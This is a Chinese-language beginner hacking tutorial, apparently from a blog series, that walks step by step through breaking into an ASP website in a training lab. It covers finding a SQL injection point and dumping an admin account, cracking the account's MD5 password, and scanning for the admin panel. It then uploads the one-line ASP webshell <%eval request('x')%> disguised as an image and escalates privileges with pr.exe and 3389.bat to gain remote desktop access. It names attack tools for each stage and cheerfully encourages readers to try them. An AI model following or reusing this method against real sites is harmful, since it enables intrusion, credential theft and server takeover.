首先,大家先跟著我一起背誦三字經(jīng)。


這是一篇在腳本小子的世界里流傳的比較廣的滲透三字經(jīng),也是拿下一個(gè)網(wǎng)站的基本思路。
何為腳本小子?一般來說,我們通常會(huì)把以“黑客”自居并沾沾自喜的初學(xué)者叫做腳本小子。腳本小子不像真正的黑客那樣發(fā)現(xiàn)系統(tǒng)漏洞,他們通常使用別人開發(fā)的程序來惡意破壞他人系統(tǒng)。
通常的刻板印象為一位沒有??平?jīng)驗(yàn)的少年,破壞無辜網(wǎng)站企圖使得他的朋友感到驚訝。他們常常從某些網(wǎng)站上復(fù)制腳本代碼,然后到處粘貼,卻并不一定明白他們的方法與原理。他們欽慕于黑客的能力與探索精神,但與黑客所不同的是,腳本小子通常只是對(duì)計(jì)算機(jī)系統(tǒng)有基礎(chǔ)了解與愛好,但并不注重程序語言、算法、和數(shù)據(jù)結(jié)構(gòu)的研究,雖然這些對(duì)于真正的黑客來說是必須具備的素質(zhì)。

今天,小白帶你入門腳本小子。文章開頭一起朗讀的三字經(jīng)文不知道大家還有沒有印象。一般來說,最簡單的滲透流程就來自這三字經(jīng):找注入-爆賬號(hào)-找后臺(tái)-傳小馬-拿權(quán)限。其中,這個(gè)流程的每一個(gè)階段都有代表性的利用工具,先提前和大家介紹一下。
0x01 找注入 && 0x02 爆賬號(hào)
工具:啊D注入工具、椰樹、Pangolin(穿山甲)、havij(胡蘿卜)
0x03 找后臺(tái)
工具:御劍后臺(tái)掃描、wwwscan掃描器
0x04 傳小馬
工具:各種一句話木馬、中國菜刀、中國蟻劍
0x05 拿權(quán)限
工具:pr提權(quán)工具、巴西烤肉提權(quán)工具
先不講工具的原理這些廢話,下面開始直接帶你滲透一個(gè)網(wǎng)站。####

由于小白手上沒有對(duì)應(yīng)的實(shí)驗(yàn)環(huán)境,轉(zhuǎn)戰(zhàn)i春秋,直接利用i春秋網(wǎng)站上提供的環(huán)境為大家來演示。



演示開始##
Setup 1 找注入###
打開桌面上的火狐瀏覽器,出現(xiàn)如下圖的頁面

什么都不要想,直接上啊D注入工具




成功找到注入點(diǎn),如下圖所示。

Setup2 爆賬號(hào)###
右鍵找到的注入點(diǎn)-注入檢測

點(diǎn)擊右上角的檢測開始注入檢測





最后得到網(wǎng)站的某個(gè)賬號(hào),用戶名是linhai,密碼為d7e15730ef9708c0。一般來說,數(shù)據(jù)庫存放的密碼應(yīng)該是經(jīng)過md5加密過的,怎么破?別慌!

解密MD5網(wǎng)站: http://www.dmd5.com/

解密md5后得到密碼值為linhai19760812

Setup3 找后臺(tái)###
此步驟為找到網(wǎng)站的管理后臺(tái)。來人啊,上工具。


打開后開始掃描


接下來,訪問掃描到的后臺(tái)地址,登陸。


直接登陸到網(wǎng)站的后臺(tái),到這里,是不是內(nèi)心還伴隨著一點(diǎn)小小的心動(dòng)呢?

Setup4 傳小馬###
由于是asp的站點(diǎn),確定需要的是asp一句話木馬,代碼為
<%eval request("x")%>,密碼為x
小白試了很多的上傳點(diǎn),比如這里:

還有這里

這里

這里


但是?。。?/strong>功夫不負(fù)有心人,還是讓我找到了一個(gè)上傳點(diǎn)。


于是乎新建一個(gè)txt文檔,寫上asp一句話<%eval request("x")%>,密碼是x。并且把文件類型改成圖片。也不要只寫一行代碼,不大不小,100行差不多。

然后上傳



接下來的思路就是利用網(wǎng)站的數(shù)據(jù)庫功能把我們上傳的文件后綴由jpg改成asp


然后,拿出我們的菜刀,連接剛我們復(fù)制到根目錄的xbk.asp文件(木馬)
地址是:http://www.test.ichunqiu/xbk.asp,密碼是x。

在空白處 右鍵-添加 ,輸入木馬的地址和網(wǎng)站





Setup5 拿權(quán)限###
右鍵木馬的地址,選擇 虛擬終端

輸入任意命令,發(fā)現(xiàn)沒有權(quán)限,訪問被拒絕


接下切換到回收站目錄下,回收站是幾個(gè)有限擁有執(zhí)行權(quán)限的目錄。

分別找到我們的提權(quán)三件套:cmd.exe、pr.exe、3389.bat



接著,將三件套上傳到回收站目錄下面,如下圖所示。

接下來,進(jìn)入我們上傳的cmd.exe的虛擬終端,執(zhí)行我們的提權(quán)三件套。




執(zhí)行完成之后,打遠(yuǎn)程連接,進(jìn)入服務(wù)器。





至此,一個(gè)完整的滲透過程到此結(jié)束。

Ps:喜歡的留個(gè)贊b( ̄▽ ̄)d ~也可以關(guān)注專題:黑客師。

下一篇文章:小白客帶你走進(jìn)黑客世界14之論kali滲透的藝術(shù)